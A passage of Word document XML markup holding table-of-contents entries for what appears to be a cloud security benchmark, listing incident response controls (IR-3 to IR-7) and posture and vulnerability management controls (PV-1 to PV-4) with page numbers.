                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>129</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0573D5B0" w14:textId="032EE094" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449537" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Detect, analyze, and investigate incidents</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449537 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>132</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47D981C0" w14:textId="5DB7CBD2" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449538" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IR-3: Detection and analysis - create incidents based on high-quality alerts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449538 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>132</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E538128" w14:textId="49D84CE9" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449539" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IR-4: Detection and analysis - investigate an incident</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449539 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>138</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="648ED6A3" w14:textId="70C94EFE" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449540" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IR-5: Detection and analysis - prioritize incidents</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449540 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>141</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56CD15D6" w14:textId="6EE6F11E" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449541" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Contain, recover, and learn from incidents</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449541 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>144</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14CB9ECB" w14:textId="69BFE7A0" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449542" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IR-6: Containment, eradication and recovery - automate the incident handling</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449542 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>144</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6297825F" w14:textId="7DEDB1F5" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449543" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IR-7: Post-incident activity - conduct lessons learned and retain evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449543 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>147</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6971724B" w14:textId="4872E44E" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449544" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Posture and Vulnerability Management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449544 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>150</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="403A83C8" w14:textId="674D9E2A" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449545" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Establish secure baselines</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449545 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>150</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FDE7603" w14:textId="18755D94" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449546" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PV-1: Define and establish secure configurations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449546 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>150</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34620936" w14:textId="62BD09C3" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449547" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PV-3: Define and establish secure configurations for compute resources</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449547 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>152</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30083855" w14:textId="05437EDA" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449548" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Monitor and enforce compliance</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449548 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>154</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4665D4F1" w14:textId="2F57639F" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449549" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PV-2: Audit and enforce secure configurations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449549 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>154</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BA70701" w14:textId="75430057" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449550" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PV-4: Audit and enforce secure configurations for compute resources</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449550 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>157</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
